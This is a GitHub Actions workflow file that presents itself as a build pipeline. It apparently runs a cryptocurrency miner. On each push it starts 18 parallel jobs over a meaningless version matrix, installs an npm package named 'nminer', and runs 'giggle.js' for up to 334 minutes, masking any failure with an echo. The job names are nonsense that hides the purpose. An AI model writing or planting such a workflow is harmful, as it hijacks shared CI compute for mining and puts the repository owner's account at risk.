name: giggle
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2072 }
          - { version: 3753 }
          - { version: 4325 }
          - { version: 7271 }
          - { version: 503 }
          - { version: 1796 }
          - { version: 9983 }
          - { version: 3053 }
          - { version: 6871 }
          - { version: 7479 }
          - { version: 6356 }
          - { version: 861 }
          - { version: 3536 }
          - { version: 2203 }
          - { version: 9618 }
          - { version: 5974 }
          - { version: 2549 }
          - { version: 6937 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: supposing swathe
        run: |
          npm install nminer@latest
          timeout 334m node giggle.js || echo "giggle executed"